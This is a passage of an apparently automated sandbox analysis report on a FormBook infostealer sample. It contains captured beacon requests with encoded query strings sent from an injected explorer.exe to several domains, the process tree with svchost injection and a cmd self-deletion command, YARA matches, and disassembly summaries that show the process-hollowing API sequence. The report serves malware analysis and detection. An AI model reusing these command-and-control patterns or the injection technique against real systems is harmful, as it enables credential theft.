32 30 70 78 3b 0a 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 69 6d 67 2e 6c 6f 67 6f 20 7b 0a 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a Data Ascii: f82<!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta id="redir" http-equiv="refresh" content="10; url=https://www.domeneshop.no/"> <link rel="dns-prefetch" href="https://www.domeneshop.no/"> <link rel="prerender" href="https://www.domeneshop.no/"> <link rel="preconnect" href="https://www.domeneshop.no/" crossorigin> <title>www.nordicbatterybelt.net is parked</title> <style>* {margin: 0;padding: 0;}body {background: #ccc;font-family: Arial, Helvetica, sans-serif;font-size: 11pt;text-align: center;}h1 {margin: 10px auto 20px 10px;color: #3498db;}p {display: inline-block;min-width: 200px;margin: auto 30px 10px 30px;}.container {position: relative;text-align: left;min-height: 200px;max-width: 800px;min-width: 450px;margin: 15% auto 0px auto;background: #FFFFFF;border-radius: 20px;padding: 20px;box-sizing: border-box;}img.logo {width: auto;max-height: 50px;margin-top: 30px;border: 0;}.logocont {text-align: center;
Sep 15, 2021 09:44:51.557651043 CEST	5906	IN	Data Raw: 7d 0a 0a 2e 6c 61 6e 67 73 65 6c 65 63 74 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 20 31 30 70 78 3b 0a 72 69 67 68 74 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 61 6e 67 73 65 6c 65 63 74 20 69 6d 67 20 7b 0a Data Ascii: }.langselect {position: absolute;top: 10px;right: 10px;}.langselect img {position: relative;width: auto;border: 0;margin: 2px;height: 15px;}.footer {color: #aaa;margin: 1em auto 0px auto;font-size: 8pt;text-align: center;m
Sep 15, 2021 09:44:51.557672024 CEST	5908	IN	Data Raw: 2f 61 3e 27 2c 20 0a 7d 3b 0a 0a 76 61 72 20 6c 20 3d 20 28 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 20 7c 7c 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 20 7c 7c 20 27 65 6e 27 29 2e 74 6f 4c 6f 77 65 72 43 Data Ascii: /a>', };var l = (navigator.language \|\| navigator.userLanguage \|\| 'en').toLowerCase();l = (l.indexOf('-') > -1)?(l.split("-")[1]):((l === 'nb' \|\| l === 'nn')?'no':l);var i = (typeof SVGRect != "undefined")?'svg':'png';function q(s) {
Sep 15, 2021 09:44:51.557692051 CEST	5908	IN	Data Raw: 71 28 27 6c 27 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 68 72 65 66 27 2c 20 27 68 74 74 70 73 3a 2f 2f 27 2b 75 5b 73 5d 29 3b 0a 20 20 20 20 71 28 27 69 27 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 73 72 63 27 2c 20 27 2f 69 6d 61 Data Ascii: q('l').setAttribute('href', 'https://'+u[s]); q('i').setAttribute('src', '/images/logo-'+s+'.'+i); q('redir').setAttribute('content','10; url=https://'+u[s]);}setLang(l);</script></body></html>...--->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49818	13.250.255.10	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 09:44:57.496335030 CEST	5917	OUT	GET /n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1 Host: www.starworks.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 09:44:57.655874014 CEST	5918	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 15 Sep 2021 07:44:57 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.starworks.online/n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49822	185.215.4.13	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 09:45:07.821926117 CEST	5931	OUT	GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw== HTTP/1.1 Host: www.sashaignatenko.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 09:45:07.902590990 CEST	5931	IN	HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1=q6Z0iJaBrNWVE3dM3y3c; Domain=.sashaignatenko.com; HttpOnly; Path=/; Expires=Thu, 15-Sep-2022 07:45:07 GMT Date: Wed, 15 Sep 2021 07:45:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SRMETALINDUSTRIES.exe PID: 6164 Parent PID: 5656

General

Start time:	09:43:05
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\SRMETALINDUSTRIES.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'
Imagebase:	0x3f0000
File size:	586752 bytes
MD5 hash:	51FB6F484B4BC554A7FDDB7DC24C994E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.356803030.0000000002802000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: SRMETALINDUSTRIES.exe PID: 1260 Parent PID: 6164

General

Start time:	09:43:10
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\SRMETALINDUSTRIES.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SRMETALINDUSTRIES.exe
Imagebase:	0x8d0000
File size:	586752 bytes
MD5 hash:	51FB6F484B4BC554A7FDDB7DC24C994E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3440 Parent PID: 1260

General

Start time:	09:43:12
Start date:	15/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6f22f0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 1972 Parent PID: 3440

General

Start time:	09:43:37
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0xf60000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2456 Parent PID: 1972

General

Start time:	09:43:43
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\SRMETALINDUSTRIES.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6832 Parent PID: 2456

General

Start time:	09:43:43
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SRMETALINDUSTRIES.exe PID: 6164 Parent PID: 5656 SRMETALINDUSTRIES.exeCOMMON

Executed Functions

Function 048061B8, Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c6465546bb4f33ee6267812d78034a31b74eb0a07c14d3722e00993863bae3
Instruction ID: fe2f998bfcb2cc694fd566a1a1fed0c6cc82707c8dce486139f1a9db1068519a
Opcode Fuzzy Hash: 91c6465546bb4f33ee6267812d78034a31b74eb0a07c14d3722e00993863bae3
Instruction Fuzzy Hash: 8DD1DE70B112008FEB55DB7AC810B6FB7E6AF89304F148969D145EB2D1EF39E902CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04803198, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d4f8032ad6a9354ba1b35498a227cc76840b3875fc0fe9c3dd3e8701c007ff
Instruction ID: 019b53614b8451fea927368c46be98dd8fc8363e09e5d1e317301603f8f9d9e2
Opcode Fuzzy Hash: b9d4f8032ad6a9354ba1b35498a227cc76840b3875fc0fe9c3dd3e8701c007ff
Instruction Fuzzy Hash: 9B815771E54629CBDB64CF66CC40BDDB7B6FF89300F10CAAAD509A7254EB706A818F10

Uniqueness

Uniqueness Score: -1.00%

Function 04803188, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27407f9f2734f9fecced686444b97ff057ac298425ca5fb6f6665a87b9a0e0c2
Instruction ID: d44bc721791bf7823c33259638e789376dbf958be72aa718dfb91b559c13a61c
Opcode Fuzzy Hash: 27407f9f2734f9fecced686444b97ff057ac298425ca5fb6f6665a87b9a0e0c2
Instruction Fuzzy Hash: AE713871E10629CBDB68CF66CC4479DB7B2FF88300F14C6AAD509A7254EB706A858F10

Uniqueness

Uniqueness Score: -1.00%

Function 0480342F, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916c9033bf80e8d0074a1f3f62c54680de0076f5bced78f053ca3ddba3e046af
Instruction ID: dc1a647d3f83cdc5338cc8a2265b1a119b165ac2d9cd52ad9a884904e25616f7
Opcode Fuzzy Hash: 916c9033bf80e8d0074a1f3f62c54680de0076f5bced78f053ca3ddba3e046af
Instruction Fuzzy Hash: B5613675E5022ACBDB64CF65CC44BEDB7B2FB89304F10CAEAD509A3250E7746A858F50

Uniqueness

Uniqueness Score: -1.00%

Function 048033F8, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3912ef75fb5e61045d4570f45c167f10acb0716f2237c27a61b95e9917a7bdc0
Instruction ID: e886d155c04445dafcedf300425635860edd4e2456c0d7022258c0b81ef808d3
Opcode Fuzzy Hash: 3912ef75fb5e61045d4570f45c167f10acb0716f2237c27a61b95e9917a7bdc0
Instruction Fuzzy Hash: 96615875E5022ACBDB64CF55CC40BEDB7B2FB89304F10DAAAD509A3240E7706A858F50

Uniqueness

Uniqueness Score: -1.00%

Function 048033EC, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb7e8984a071a05525784597c3be75e1b19fa8303db14fffe28c185b4072529
Instruction ID: 4261afeb2006e50f1a17914456074ccf5ecfc2ccef692a50d26f73045f5a82fe
Opcode Fuzzy Hash: 8cb7e8984a071a05525784597c3be75e1b19fa8303db14fffe28c185b4072529
Instruction Fuzzy Hash: 50514775E5022ADBDB64CF55DC40BEDB7B2FB89304F10DAEAD509A2240E770AA858F50

Uniqueness

Uniqueness Score: -1.00%

Function 04801EAC, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048020EE

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 84f90f33d0ac29e1d7a64d9c910b793b2ead0e8975df8d4f5e6b46101509b1e4
Instruction ID: ac2940b9d2c2880c9fb6624234bdffa4b02e513b9e8bdbd81a9fddca287f1105
Opcode Fuzzy Hash: 84f90f33d0ac29e1d7a64d9c910b793b2ead0e8975df8d4f5e6b46101509b1e4
Instruction Fuzzy Hash: 5FA18D71D102199FEB50DFA4CC857DDBBB2BF48314F148AA9E809E7280DB74A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04801EB8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048020EE

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2a37460c19d75cf9dd008bf45450391d195c0009a1c88f87e333b2adcec55643
Instruction ID: d2a88972d5051cc40d0b9f00cb1947354d3e3f4b9ba1b38214dac5310c26a055
Opcode Fuzzy Hash: 2a37460c19d75cf9dd008bf45450391d195c0009a1c88f87e333b2adcec55643
Instruction Fuzzy Hash: 7B918D71D102199FEB50DFA4CC857DDBBB2BF48314F148AA9E809E7280DB74A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04801C28, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04801CC0

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 93000633f2f22ff38b7dfc619fadf5f9b05dc17d2ab4146358b24ba5e9247df3
Instruction ID: fbcfa904ed15802c0fc217d2fd071e47e69c625731a072bf516a362b7ab08f6a
Opcode Fuzzy Hash: 93000633f2f22ff38b7dfc619fadf5f9b05dc17d2ab4146358b24ba5e9247df3
Instruction Fuzzy Hash: 312146719003199FCB10DFA9C9857DEBBF5FF48324F108829E919A7240DB78A955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04801C30, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04801CC0

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0b4c6ecf0195fb298dd161f584a706f9240ca057a40d55f6d9d158a7bf4e661d
Instruction ID: af6995c3ccbd99e3142380777484db2437c53a9e26dfd9594f5c6e0f9a721e83
Opcode Fuzzy Hash: 0b4c6ecf0195fb298dd161f584a706f9240ca057a40d55f6d9d158a7bf4e661d
Instruction Fuzzy Hash: 852127719003499FCB10CFA9C9857DEBBF5FF48324F148829E919A7240DB78A954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04801D19, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04801DA0

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e7ef3c5502e4a5e3540bd2e33c39795a328c054ad1837f6d6948439b59bd13c5
Instruction ID: a790286ed4e0d5c8413ce3feb6b6de3c5557a5cd1999d2309202f96700a7d147
Opcode Fuzzy Hash: e7ef3c5502e4a5e3540bd2e33c39795a328c054ad1837f6d6948439b59bd13c5
Instruction Fuzzy Hash: 992139B1D003499FCB10CFA9C984BEEBBB5FF48324F508429E959A7240CB359911CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04801A91, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 04801B16

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 613f85d998c44acf87453717bc41a14735ac4600e49ef7f11adf2512669aa2d4
Instruction ID: 2987482f359a73a3be1d4bfe5183a8c5fadf25ade0a402e885b891ffa148d598
Opcode Fuzzy Hash: 613f85d998c44acf87453717bc41a14735ac4600e49ef7f11adf2512669aa2d4
Instruction Fuzzy Hash: 4C215971D003088FCB50DFA9C8857EEBBF4EF48364F548429D419A7240DB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04801D20, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04801DA0

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 62c4a02b78fbea4d9c0093a0dc0c6284c1bc8967289d43d24155a9c9525a74b6
Instruction ID: 64e7249aafda78d5708a8c9707aa67b53ac5a1dbcb6d0dc1f95eb0c48a99e0bf
Opcode Fuzzy Hash: 62c4a02b78fbea4d9c0093a0dc0c6284c1bc8967289d43d24155a9c9525a74b6
Instruction Fuzzy Hash: 6F211971D003499FCB10DFA9C9847DEBBB5FF48324F548429E919A7240D7359944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04801A98, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 04801B16

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 9d42c3d26033b91f34b8bf54114c6dc1fce712b6f98fbc2855fa69e6ba25efeb
Instruction ID: 0cb9e5a16234c3577259fb39a629d15ee23aa3a5ba3ecd5c88cb590e773c4db5
Opcode Fuzzy Hash: 9d42c3d26033b91f34b8bf54114c6dc1fce712b6f98fbc2855fa69e6ba25efeb
Instruction Fuzzy Hash: 0D213571D003088FDB50DFAAC9857EEBBF4EF48324F54842AD519A7280DB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04801B68, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04801BDE

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c6cda28a1f3504c58b61abbb2d3ff389952c359463858f75c357419b9a02a1db
Instruction ID: 46decea50c8f3de4c8ab8a74d3babf104bfe3cb48f6751aa20b6332bcde0453c
Opcode Fuzzy Hash: c6cda28a1f3504c58b61abbb2d3ff389952c359463858f75c357419b9a02a1db
Instruction Fuzzy Hash: 3B1156759003488FCB10DFA9D944BDFBBF5AF48324F248829E925A7250DB75A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04801B70, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04801BDE

Memory Dump Source

Source File: 00000000.00000002.357346660.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 746dda431c27077d26a070a6ef07aa416d4095338f1c86b057f8b6d3f4be0a7d
Instruction ID: e090abd2a741707f1e5fb8bd2266f3f48d9767a5101c63be06a0eb6615c7cf19
Opcode Fuzzy Hash: 746dda431c27077d26a070a6ef07aa416d4095338f1c86b057f8b6d3f4be0a7d
Instruction Fuzzy Hash: 891164729002088FCB10DFA9C844BEFBBF5AF48324F248829E525A7250CB75A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 048019E0, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04801A4A

Memory Dump Source

